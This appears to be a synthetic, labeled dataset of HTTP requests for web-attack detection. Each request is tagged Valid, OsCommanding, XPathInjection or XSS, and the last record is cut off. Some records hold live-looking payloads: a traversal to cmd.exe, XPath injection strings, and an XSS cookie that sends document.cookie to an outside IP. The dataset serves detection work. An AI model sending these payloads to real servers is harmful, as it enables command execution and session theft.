From: 5qne@rrdvdl8.net
If-Modified-Since: Mon, 26 Oct 09 12:00:05 GMT
If-Unmodified-Since: Wed, 03 Oct 07 16:15:31 UTC
If-Match: *
If-None-Match: *
If-Range: "6RhJU78e1c3p8Q4csu8"
Max-Forwards: 8
MIME-Version: 9.5
Pragma: el=2ynssq
Proxy-Authorization: Basic aGJlYXR4c2k6VHIzZg==
Authorization: Basic ZnRzZWo6eGNzZWUyb2k=
Range: -3850,54-
Referer: /g6xponeh/zoie/4oa73.dll
TE: trailers,gzip
Trailer: Authorization
User-Agent: Mozilla/1.2 (X11; U; SunOS sun4u 8.2; hw-7e; rv:1.6.1) Gecko/20935336
UA-CPU: Sparc
UA-Disp: 0226,856,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 772x118
Via: HTTP/7.5 www.ywb5n.shtml, aesnM/0.9 www.oELug.png:69, FTP/3.7 28.126.104.116:0058
Transfer-Encoding: deflate
Upgrade: 1e4/9.3, eielY/2.7, nearu0/5.9, qtc/5.6, ttot/4.4
Warning: 584 29.186.172.18:663 "aatB6aAprgMv02tqrt" 
X-Forwarded-For: 129.122.159.101
X-Serial-Number: 054285780233715
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19954
Start - Id: 43685
class: OsCommanding
GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.tth7manen.cz
Connection: Uobsbc6t
Accept: */*
Accept-Charset: x-mac-arabic
Accept-Encoding: 
Accept-Language: pnpai-otrttn, oiaEev-aho3zju;q=0.9, uo-Estrnhyu, 1rpNlg-a;q=0.0
Cache-Control: only-if-cached
Client-ip: 149.80.234.160
Cookie: pqtqeOtm5u1fta=438934;frctfnL=o\5iyun;w;stuesheGv8oa=74746;rdmto=i;Lmvo=ageh5tpcn
Cookie2: $Version="4"
Date: Sun, 29 Mar 09 17:58:36 CET
ETag: "Ypk8OsVE4.PySPp"
Expect: 100-continue
From: o68nO@tetn70i.cz
If-Modified-Since: Wed, 08 Dec 04 23:11:12 GMT
If-Unmodified-Since: Sun, 01 Oct 06 06:42:34 GMT
If-Match: "w@QVjMuwwxTIbtY6"
If-None-Match: *
If-Range: *
Max-Forwards: 72
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic cWlyaWNibjplb241ZWdp
Authorization: Digest algorithm=MD5
Range: 0932-655,7-822597,-7
Referer: http://www.wasmnE.biz/fUTy/4t0hche.png
TE: chunked,trailers,chunked
User-Agent: Mozilla/7.1 (compatible; Konqueror/4.6; Unix; atek; 9huahhen9i; iegeH8r4)
UA-CPU: PowerPC
UA-Disp: 0760,6921,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 827x275
Via: 7.0 59.248.227.235, 7.8 www.tnTaseD.gif:9
Transfer-Encoding: leanot
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 267 17.232.146.208 "uEwtOaeI" "Fri, 11 Sep 09 24:54:08 CET"
X-Forwarded-For: 163.232.189.112
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43685
Start - Id: 5489
class: Valid
PUT /e_r@iLJmGuxwbd5/r4EshHfebztnnnteI.htm? HTTP/1.1
Content-Length: 49
Content-Language: 6dA,Bs,von
Content-Encoding: compress
Content-Location: /LsbabEe/usgaij/sM6e5/neargonf.php3
Content-MD5: RTZlcmlpZzFvYXVlZUxzdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 30 Jul 07 23:34:11 CET
Last-Modified: Sat, 18 Aug 07 23:48:52 GMT
Host: www.9yte.de
Connection: lntaOl
Accept: */*
Accept-Charset: gb2312;q=0.7, iso-8859-9, ks_c_5601-1987;q=0.3, big5;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=958
Client-ip: 55.210.233.217
Cookie: mfn=n/wgete0anctcis1 icTaz>e
Cookie2: $Version="8"
Date: Sat, 08 Mar 08 19:00:21 CET
ETag: "77PNMkyNpKkNBeXH"
Expect: dm7lh
From: a2re@neunel.uk
If-Modified-Since: Thu, 25 Feb 10 07:25:57 GMT
If-Unmodified-Since: Tue, 16 Nov 04 08:16:11 GMT
If-Match: "q5c0b8s7m-vdMnowmRa"
If-None-Match: *
If-Range: ".rNpVpNexcqCteZ6d"
Max-Forwards: 578
MIME-Version: 6.9
Pragma: i3f=e
Proxy-Authorization: cegiae nhwor=tnnO4
Authorization: jtwher eUdj=6Eteyot
Range: 20-882916
Referer: /rayi/oangoo/wlfi/8eLtnaS/amet.bin
TE: trailers
Trailer: If-None-Match
User-Agent: enDqVktO http://www.coae.net
UA-CPU: 68000
UA-Disp: 401,4079,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 154x121
Via: 3.0 153.36.207.30, HTTP/1.7 www.otnsss.gif, 9.6 209.90.247.247
Transfer-Encoding: compress
Upgrade: 7le/3.6, 8ss/3.8, jc8srs/9.3, rmha/3.0
Warning: 081 www.m8rn1rmo.shtml:31303 "6h7tteywuheldre" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 5440526
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~

nt4e=498869&Ft1nrh=phpt@&nhlike4Xb1cAf4=5881191

End - Id: 5489
Start - Id: 27246
class: Valid
GET /mS/thqit4pnrrt4bjrht5oq/t1FmsO.@eX0F@/deLM1sBxVi.mspx?xeDr2s=h1d%7CwgetO%7EbinwdH5ii&otR0lhi=38386&jexecl9xchildjV0=qivieNlYizOet&8yh=wrj_km- HTTP/1.1
Host: 72.110.202.223
Connection: oeIdsa
Accept: video/*, audio/x-wav;q=0.1
Accept-Charset: hz-gb-2312;q=0.2, windows-874
Accept-Encoding: identity;q=0.6, deflate, compress;q=0.5, identity;q=0.4
Accept-Language: rt6v-hiadn;q=0.9, wrnxhe-soeeeHe4, neCslno-8, woivmmct-cS4a9bs;q=0.6, 3-a
Cache-Control: max-stale
Client-ip: 38.30.205.231
Cookie: elwcLgPSGQc=786
Cookie2: $Version="898"
Date: Mon, 07 Apr 08 07:50:24 GMT
ETag: W/"gXr1_ZCSbGUdw9r"
Expect: 100-continue
From: rted@eseO4iri7.net
If-Modified-Since: Tue, 24 Nov 09 17:46:11 UTC
If-Unmodified-Since: Wed, 07 Oct 09 18:02:22 GMT
If-Match: "VW_LA5ckMnAZnIQK"
If-None-Match: *
If-Range: Thu, 15 Jan 04 06:32:18 GMT
Max-Forwards: 541
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: NTLM YXBzZmxob2xJYWVhc3lsb3NzbHNzcmNvc25tZW55b2hvemV1aGVCNnRw
Authorization: Digest nonce
Range: 222622-977,941925-007
Referer: http://icye.net/s9czsy.mdb
TE: trailers,chunked
Trailer: If-Match
User-Agent: teie66eN83ri6
UA-CPU: 68000
UA-Disp: 4043,642,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8847x8709
Via: ah4m/6.5 www.ohtemeik.jpg, FTP/7.9 43.162.203.159, 8.3 208.120.39.183
Transfer-Encoding: deflate
Upgrade: nnr3no/2.4, ssa6/6.6, nrmmhe/0.5, dTflr/9.1
Warning: 037 www.tnd5.shtml "oufsndu0q99i3Mpd6" 
X-Forwarded-For: 59.58.186.111
X-Serial-Number: 03585265611938930040
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 27246
Start - Id: 23537
class: Valid
GET /turdaei7odsiv.gif?wnniOno=Nvbscript+%27s&O43w@=3mettsutuaeYdsbs&hrt=tph%3A%28ei+objecthyZ&ue=nq%3Dl&Ztah=allgin&ne2ldtwK6ji8eh=ebcGN&fa3N6PYu-C=572&ouanlne0puiHtut=cljfo HTTP/1.0
Host: 135.114.248.204
Connection: keep-alive
Accept: image/*
Accept-Charset: iso-8859-3;q=0.4, euc-tw, iso-10646-ucs-2;q=0.1
Accept-Encoding: *
Accept-Language: h63-d;q=0.4
Cache-Control: no-transform
Client-ip: 17.236.93.216
Cookie: scieatw=ee 
Cookie2: $Version="90"
Date: Sat, 29 Dec 07 04:37:48 UTC
ETag: W/"sO3QtpkiM.1AmoO8y"
Expect: 100-continue
From: sateEoa@mrewwclz.be
If-Modified-Since: Mon, 08 Feb 10 03:27:33 UTC
If-Unmodified-Since: Fri, 12 Feb 10 22:24:25 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 31 May 08 02:47:25 CET
Max-Forwards: 8607
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM NWdnYXRodHlpbGV5eXR3Ym5ldW9sZWVlUnZhYW1zZWtkdGlwZWhUbWlzYXNp
Authorization: Digest nc=BbbACdbA
Range: 8-461044,5-
Referer: /tulSa/hubcant/eee6odit/s4ssn/ymuwd.swf
TE: trailers
Trailer: Referer
User-Agent: tigdlnaRlprer8s
UA-CPU: StrongARM
UA-Disp: 3395,981,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4426x0282
Via: 1.6 www.3pwu.js:73475, dus/6.8 www.Huse7u.html, 5.1 www.iavoTmgA.js
Transfer-Encoding: identity
Upgrade: spef/8.1, nqu/3.7, aNy/6.5, ete8/2.7
Warning: 266 191.138.56.230:98 "diio" "Tue, 17 Apr 07 03:38:46 CET"
X-Forwarded-For: 224.154.235.176
X-Serial-Number: 467341
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23537
Start - Id: 48957
class: XPathInjection
GET /d3hyCar/6062/iuc/xnisonzy/LD8Tsk/h@vmeKuv/tA5@e1Aja/almk/anxNL9t0-DAqDL6zjI/zasgI/n2qTtwZUQgA5U.asp?obven=45723++++or+++nateiS%2Fa%2Frieii%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D1%5D+or++9%3D&lrHLtfeirlor=lisErnonf3ni HTTP/1.1
Host: 85.248.36.130:5
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9, iso-8859-8-i;q=0.9
Accept-Encoding: *
Accept-Language: n6-yxtnie;q=0.9, j3dder-Wdzte;q=0.2
Cache-Control: only-if-cached
Client-ip: 170.112.198.15
Cookie: wtEPyy=6413396;hQxUS9eOxg=iw9
Cookie2: $Version="71"
Date: Mon, 28 Sep 09 07:04:33 GMT
ETag: "FUkp6cY6gug6IFvU"
Expect: 100-continue
From: aaee5oT@0lekntq.de
If-Modified-Since: Sun, 27 Jul 08 10:53:53 GMT
If-Unmodified-Since: Mon, 30 Apr 07 07:10:17 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 02 Apr 05 08:44:32 GMT
Max-Forwards: 68
MIME-Version: 3.9
Pragma: Te2H=s
Proxy-Authorization: 7ryrer l7Fsei=9ums
Authorization: vtaa iiuEo=syio
Range: 5-
Referer: http://iaim.gov/wOTbjfio/iyncsol/tarhrvDt/7Ou2oe49.pl
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: ebuxisiyr (iHje9_c; aQwRM0UB; tkn-Cs; aUNEDaRj)
UA-CPU: MIPS
UA-Disp: 705,827,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7333x919
Via: HTTP/3.9 www.m81gt.png, aced/6.8 www.9etfm.css, HTTP/3.5 193.6.8.71
Transfer-Encoding: compress
Upgrade: 6cwot3/1.9
Warning: 219 www.NUeeo.shtml "r8tNtaTA" 
X-Forwarded-For: 58.153.30.65
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48957
Start - Id: 9018
class: Valid
GET /GpaYlasmy7Eehe/kTZpW0G/se/0GUcR3WDnR/sTsIq0c4ZP/eOkD_bf4F@Y5ZeU9b@/ecUsS9/hnioolLod/Srrodtmoai/eL-2mERW@_lo2KDo/wR.shtml?nsGEaxEnf=2656&DaThrNtevnsi=oRswe2zau%3Es&Wp2wUPejzGwU=529&Maygsrnwhte4b=mfTsclib+&eEo=65091&xc378e=ceh&fNnode1e.U5=s+n89ftp&yjEoigphbCry=nhCui&_-w4=87486&KQscript51zRmeta=9 HTTP/1.1
Host: 96.75.5.110
Connection: drAneodo
Accept: image/*, video/*;q=0.3
Accept-Charset: *
Accept-Encoding: compress;q=0.2
Accept-Language: *;q=0.2
Cache-Control: max-age=937
Client-ip: 28.236.104.175
Cookie: 3gslYitioe=41395
Cookie2: $Version="71"
Date: Sat, 01 May 04 24:02:37 GMT
ETag: "26I2bIFFiv32dP3m"
Expect: rsna=taeheo4;iaiNrrni
From: moihss@1tlab.fr
If-Modified-Since: Sat, 30 Dec 06 04:00:30 CET
If-Unmodified-Since: Wed, 29 Mar 06 07:41:57 GMT
If-Match: "IBjZGZQcuaZXxQPjr"
If-None-Match: "PAYcFawMEcPw-qEP"
If-Range: Mon, 30 Nov 09 06:14:41 GMT
Max-Forwards: 1
MIME-Version: 0.6
Pragma: aepsiD9e=lmsit
Proxy-Authorization: Basic bzdtcnRmeWk6dW1vU0xlbW8=
Authorization: Digest opaque="notrsDib"
Range: -751,66639-06
Referer: http://www.6xoboaos.cz/cdaeh5ms/autnqnf.mpeg
TE: trailers,deflate,trailers
Trailer: From
User-Agent: Mozilla/1.0 (compatible; e8o7o; Win 9x; qittiywae)
UA-CPU: MIPS
UA-Disp: 7331,790,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7425x380
Via: 3.0 7.139.119.50
Transfer-Encoding: deflate
Upgrade: t7hloe/9.4, 2ku9/0.5, egeiae/4.4
Warning: 289 www.mbxzf4og.jpg "eAnhnsteieeelokc4" "Sun, 04 Jun 06 15:45:48 CET"
X-Forwarded-For: 111.61.129.208
X-Serial-Number: 92954758156
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9018
Start - Id: 6341
class: Valid
PUT /TKX0ofh/coh/2dectnBpc7Z/sd7uGs8QtY/Dqe5/siedjctnahbfr/c8e.dll? HTTP/1.1
Content-Length: 47
Content-Language: Dt3,c,eOS
Content-Encoding: identity
Content-Location: http://innrpeaa.de/rpins7.mp3
Content-MD5: enpzYXNzeWFsbHNpaGFpbw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Jan 08 13:27:40 GMT
Last-Modified: Fri, 09 Feb 07 19:37:48 GMT
Host: 107.110.44.192
Connection: lxpntie
Accept: text/xml, application/zip
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: tyyps6e-n, iS4Onmdq-dotktbo, aEde-ayaherD
Cache-Control: only-if-cached
Client-ip: 211.106.108.116
Cookie: drirwSiethexsdi=cdvar?;tsusbper0vh=765834;daoaes=a;Yerht4=9359;rod=51504266
Cookie2: $Version="073"
Date: Fri, 08 Sep 06 24:27:01 UTC
ETag: W/"9UHlXsF@Iu6J5EC"
Expect: pshkwt=eet0oSro
From: zpatr@agAlejxt.net
If-Modified-Since: Sat, 19 Jun 04 08:10:22 CET
If-Unmodified-Since: Fri, 16 Apr 10 23:27:32 UTC
If-Match: "551qdo6jFDa.tqdf"
If-None-Match: "Df5T-4UFCuUrV_HS1Utu"
If-Range: *
Max-Forwards: 8
MIME-Version: 3.4
Pragma: pznp2e=ankd35
Proxy-Authorization: NTLM aHBob3RvbnRtaXRzY2VyZXJuYnRleXJ2blJyYXNtOWh0MWZ0N2Voc210YW9jYUUz
Authorization: Basic S3ByTHJ0OWg6ZWlxQg==
Range: 581-68555,-22163
Referer: /pthm/oe7mtsi/lemoytl.ace
TE: chunked,gzip;q=0.3
Trailer: Transfer-Encoding
User-Agent: altgyrlss/3.1.8.7
UA-CPU: PowerPC
UA-Disp: 373,864,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 456x4910
Via: 9.6 www.ahvoeee.gif, 0.0 77.198.120.58, 4.1 www.4snot.jpg
Transfer-Encoding: deflate
Upgrade: suom/1.1, roiwo/8.0
Warning: 709 26.181.87.248 "we9uas" "Sat, 02 May 09 01:56:17 UTC"
X-Forwarded-For: 253.132.79.208
X-Serial-Number: 9387717978
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

ScGimg_6@Iposition=h.f@Ne&AM2nuj-sBbodyS=logd

End - Id: 6341
Start - Id: 49091
class: XPathInjection
GET /TGWlpgEXXJLxfc/ctsynmesasEfpeqEesn/D8mz/uh/AQV/RLKK6/dBtdntHehfhni/q29gXFHWKwlqD@i4R/ey-avIu/lOeoptxpmfbsefoze/Dfl9TtrhropoostDosr.aspx?nxayra=i&hNdyhdnecgnin=d2heEFevw&SFPzAMg1K=rihdm1Tel&EilcIoit=tiNt&nnesHcce5eqhHe=91542556&FKIuFSOO6div_z=etEnlhttpxixp_tHstaedhgdiv&YItthhudmo=%24i&almooncaqc=35&arsletcs7=-sne4ts&M1zBqsormaslibr=wtiRdd%27+or++++6++++%3C+++++count%28path%2Fchild%3A%3A*%29+++++or++%27enaeu8%27+%3D+%27&rpnOjdayzOi1=37973 HTTP/1.0
Host: www.badrzzj.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 215.194.111.216
Cookie: hEHz5JG=541;tbnnlbsy=ingni;qgYefNZhVxA=eMmuae WsMt;hthblcW=64989442
Cookie2: $Version="21"
Date: Tue, 26 Oct 04 17:07:02 CET
ETag: "9zbdhmHRPBJn6NucEb"
Expect: dfeh5=siacsoEI
From: oayjh@w9ulna6.biz
If-Modified-Since: Tue, 16 Sep 08 03:12:22 GMT
If-Unmodified-Since: Wed, 19 Sep 07 08:41:47 CET
If-Match: "YX24meIygT5cF8U6B"
If-None-Match: *
If-Range: Sun, 13 Nov 05 20:50:30 UTC
Max-Forwards: 7
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: bAo1v ibijaido=uede
Authorization: 2ipAia yi2t1Oap=ceesw
Range: -21
Referer: /ufdn/neDhtm/a6ExrnOT/iislw/1dmn.cfm
TE: deflate;q=0.9,chunked;q=0.7
Trailer: Referer
User-Agent: Mozilla/6.5 (compatible; Konqueror/3.4; Linux i386; alie; ssnaeripr; fetx)
UA-CPU: x86
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7313x7197
Via: 8.9 www.fhLf.jpg
Transfer-Encoding: deflate
Upgrade: mtodno/2.6
Warning: 032 www.mhnSre.js "nIcaleerr" "Sat, 08 Jan 05 06:49:45 UTC"
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49091
Start - Id: 16826
class: Valid
GET /uY/shats5sdz/6ktotodrabiEneevahe1/nN_uGdczmYBc-RU7v/w3qd2zTlhTGph8kmU/zD9v9/inputhsIL8R@Giwget.shtml?X@GUFGhi=1666&.DQ_g=%5D+%5Cw8&tcoyhe=hhcsrhwewne&ieynhahrmoeuh=338124873&7tw3Oo90d_=o7RttOacerld&nrbits=%7E+nrainputo&cOoyie=oIt HTTP/1.1
Host: www.xuhMtsTtd.net
Connection: tm0aul
Accept: video/*, image/*;q=0.5
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.3, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 6.186.207.70
Cookie: ihexasesld=wjie@ata;woe=atmpuqr;mv5a6bnjaiunv=0-'dscript3aenlbodytr3Iye2IT;i0hbRxc=lhttps|nsi;hmeea9m=tkBcQ9lwuPa
Cookie2: $Version="84"
Date: Fri, 05 Aug 05 14:52:41 CET
ETag: "itjXOwKf@iA@iiML87g"
Expect: 100-continue
From: sLreap3i@a64Yedt.be
If-Modified-Since: Thu, 12 Apr 07 18:36:13 CET
If-Unmodified-Since: Mon, 28 Jul 08 21:12:15 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest username="lfoxlnn"
Authorization: rnec enhsia=sh2AN
Range: 76648-0900
Referer: /Peo4td5f/stit/7rtl/ishsab.mdb
TE: deflate;q=0.7
Trailer: Accept-Charset
User-Agent: 5meAbAflr
UA-CPU: MIPS
UA-Disp: 952,004,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 818x5345
Via: HTTP/0.2 www.tmesb.js
Transfer-Encoding: deflate
Upgrade: lenv/1.1, ndi/4.7
Warning: 045 www.on6iee.shtml "rinmaEtgssGotet" 
X-Forwarded-For: 244.9.245.19
X-Serial-Number: 60090044663
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16826
Start - Id: 46666
class: XSS
GET /Ipsbe/aetBym2zprnl8vnijulr/lKSUDiqNtV%uMd4y/uZee1ANeoOzFNId2UX@n/N8perla5logjJIzPCE/eFO1wN7dd.swf? HTTP/1.1
Host: 189.86.21.22
Connection: gs20
Accept: audio/basic;q=0.9, image/jpeg;q=0.3, audio/*;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: laRt-goyrlhe;q=0.4, tmeea-t;q=0.7
Cache-Control: only-if-cached
Client-ip: 174.219.236.229
Cookie: Yreplacev7on9eXW=<img     src  ="javascript: [window.open('http://26.228.255.100/de.jsp'+document.cookie);]">
Cookie2: $Version="486"
Date: Wed, 31 Mar 10 16:10:19 CET
ETag: "5zQ01NH@dpA_r7g8e"
Expect: euToil
From: os7ddt@2hedt3.cz
If-Modified-Since: Tue, 20 Apr 10 17:10:17 UTC
If-Unmodified-Since: Sun, 25 Apr 04 22:03:27 GMT
If-Match: *
If-None-Match: "D.qlHhdZPu01Y_RtlCI"
If-Range: *
Max-Forwards: 20
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest nc=BdfD5Ba4
Authorization: Digest username="oaseou"
Range: -618819
Referer: http://meowg.fr/ze1sdem/r9Pse.pdf
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: ahcoar (ac0lE@UkMh)
UA-CPU: PowerPC
UA-OS: Linux
UA-Color: color32
UA-Pixels: 630x4242
Via: 7.8 249.60.46.84
Transfer-Encoding: ygf9; oent=akooeka6
Upgrade: sNn/2.2, tbnncm/6.1
Warning: 212 www.ee2Ee.js "iuaewa4tc" 
X-Forwarded-For: 216.174.136.108
X-Serial-Number: 19077842196498
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46666
Start - Id: 18208
class: Valid
GET /a30ns/eZqsRiDwYX3u/fHeemidtrqsi/Yilzrehnlgt/onnlrohanawBlwocz/_PFUTKncbin/tk0Ne.tiff?2oerfuddijvEo=erFREs+h&oucirbI4j6Th=0ei HTTP/1.0
Host: www.hmrEt.com
Connection: close
Accept: text/*;q=0.1, audio/*;q=0.4, video/mpeg
Accept-Charset: x-mac-icelandic;q=0.0, windows-1258
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 18.171.181.243
Cookie: unionHzinputQL5objectvO=Ds3;bcx7pmtoe=a 9 $tzinput;msnuibv=2iIs$
Cookie2: $Version="20"
Date: Thu, 22 Nov 07 18:56:43 GMT
ETag: W/"kbsG2wxTIYHzOzT-h"
Expect: 100-continue
From: oritsj@i639iid.org
If-Modified-Since: Fri, 30 Jan 04 09:20:42 GMT
If-Unmodified-Since: Sun, 29 Apr 07 14:28:51 CET
If-Match: *
If-None-Match: *
If-Range: "_NjsNoYOIFtJFpnv"
Max-Forwards: 5628
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: udkE o8jpteaz=eet8ehdn
Authorization: Basic ZWFSeGlpYjp3dHNjODg=
Range: 666465-916
Referer: /mrfy8.jpeg
TE: trailers,deflate;q=0.8
Trailer: Referer
User-Agent: Mozilla/5.3 (Machintosh; U; PPC 3.9; s5-ll; rv:8.3.7) Gecko/87824689
UA-CPU: StrongARM
UA-Disp: 202,576,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 446x226
Via: 9.7 146.141.142.83:07611
Transfer-Encoding: compress
Upgrade: hicew/7.4, 1ok/5.7, 4ba/6.1, Inm/8.9, hutr/5.7
Warning: 457 249.243.123.227 "ar3gutfzh" "Thu, 05 Jul 07 12:26:34 GMT"
X-Forwarded-For: 164.38.194.242
X-Serial-Number: 8413753908190
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18208
Start - Id: 14670
class: Valid
GET /pUSY6L@GibbdPe-Ir/N3sjaostmDBeiTtiols/usrd3zwDWuiMn2/iietd2/1skt9ilalusEc/bectttsmSqHnggshowsy/winLn/iqt6kqTb.cfm?ulktAw1TeoSsrt3=y+th4+i%26n&dvSoc2reoo=i%2Ba&dIsrdwlih3op=eo+1ryZem3ae&xqB9Ffmm=8801590&n3ebutrrehc=h%29etedfoasLsMe%5D&ynelcAuer0gae=4ncTog&hNifAsau=0l2_a HTTP/1.0
Host: www.ndSnseoiEe.org
Connection: osmEoab
Accept: video/*;q=0.2, video/quicktime, text/html;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: 4oxene-6ufrs;q=0.1
Cache-Control: min-fresh=18
Client-ip: 101.93.88.249
Cookie: zNnJuAdC=lallAsttaFspztm;iu9mnqaprxdUh=61;nelmeakPivRfh=tfoeBitsiuessh5a;nsditueeularm=Roe0;ECbHucvwV=108448
Cookie2: $Version="1"
Date: Tue, 11 Mar 08 24:12:27 GMT
ETag: "7TA1tq-VAIZ2QijN"
Expect: ssaxPoA4
From: ew4dDBs@eoeatshefo.uk
If-Modified-Since: Thu, 11 Mar 04 11:40:17 GMT
If-Unmodified-Since: Wed, 12 Nov 08 07:17:51 GMT
If-Match: *
If-None-Match: "beDpt6P.eFnaf.yW"
If-Range: "uUh.FTzrl@.fp4Aax"
Max-Forwards: 80
MIME-Version: 9.1
Pragma: ptjr=teten5e
Proxy-Authorization: Lclthi ahcl8ti=1sdr
Authorization: Basic c21lZHR0bjp1ZHJoc2hlbA==
Range: 95058-8
Referer: http://ja3sTg.st/prie/lEgkt5eb/usibteo/2maqsa.txt
TE: chunked,deflate;q=0.9
Trailer: Pragma
User-Agent: Mozilla/1.6 (Windows; U; Windows NT 5.5; Cd-s1; rv:3.6.7) Gecko/85784151
UA-CPU: Sparc
UA-Disp: 1652,237,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 4042x463
Via: FTP/3.2 www.edepb.css, HTTP/3.1 www.wqnwEnh.css
Transfer-Encoding: gzip
Upgrade: oEui1/6.9, nhe/8.3, tee/2.6, jeE7/5.3
Warning: 597 67.184.199.201:130 "0or2nhuteaidi1Ak2" 
X-Forwarded-For: 80.15.213.182
X-Serial-Number: 5935364150091795
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14670
Start - Id: 13696
class: Valid
GET /tdi7hhe/EnnatIpfitrdt2/ozmo/lSeesOwaldhelen/eIK/akpwOAew0Vc-/i3childq.mspx? HTTP/1.0
Host: www.e5atfce.ch
Connection: keep-alive
Accept: application/rtf, audio/*, audio/*;q=0.6
Accept-Charset: *
Accept-Encoding: identity;q=0.0, identity, gzip, gzip
Accept-Language: contnt-tercipdi;q=0.1, nnjNa-oTogql, efe-8n, setiysea-yii7, er-oneodtu;q=0.8
Cache-Control: no-store
Client-ip: 125.21.251.16
Cookie: tuthatrpTshr=LLl-oOeln;gi0lifeete=N ;sps=01485;Loatlmc='oio;veVDf3Iv8GSN=6777707;8n=einsertoW6yaechoreHea1Ttt ae
Cookie2: $Version="554"
Date: Sun, 22 Jul 07 24:17:18 UTC
ETag: W/"h1UUMblmY5tubv8d"
Expect: eioee5
From: s29eksF@wcAom7est.fr
If-Modified-Since: Fri, 31 Oct 08 23:51:55 GMT
If-Unmodified-Since: Tue, 21 Oct 08 22:47:57 CET
If-Match: "SFI6nCGASwXQbBgP"
If-None-Match: "5dm5YN2pQtNeCGhPw"
If-Range: Wed, 13 Apr 05 24:43:24 UTC
Max-Forwards: 0206
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic c251dXl0OmdoempzdQ==
Authorization: itaAt ua0ako=mdfeoah
Range: 7428-
Referer: http://eneOcd.net/ep0wless/aLeS.txt
TE: trailers,trailers,chunked;q=0.4
Trailer: Authorization
User-Agent: Mozilla/3.6 (compatible; Konqueror/2.8; Open BSD i586; T0nNao; my9K1s4mou; 4nt4reere0)
UA-CPU: PowerPC
UA-Disp: 146,6247,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 757x935
Via: HTTP/8.0 www.hdelb.htm, 8.5 www.nltdw.js
Transfer-Encoding: gzip
Upgrade: 4yH/4.4, dcnnon/3.0, oltntt/9.4
Warning: 757 36.29.209.66 "rvr2" 
X-Forwarded-For: 18.131.227.185
X-Serial-Number: 1852790108043394492
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13696
Start - Id: 13157
class: Valid
GET /Yb/ogqdEOpASsuL_p5Ode.htm?i5elctlo=0mbzaS7hnmdlnmaebe&eOstoEfleee3=oanCpasswdcu&szn8e=8523977&8DselectTGn=%2B&oi1acouleCgeTsp=47&mldHbRafhiSyRN=15392&iatNksarenabt=o6n-&spkrDste=e6r&rn8=sPkPN&ehnfg=318832&d8tatcj=ceenn3eA&PF50=t+&canotfse=85 HTTP/1.1
Host: 227.142.21.253
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9;q=0.3, cp-936;q=0.3
Accept-Encoding: compress;q=0.5, identity
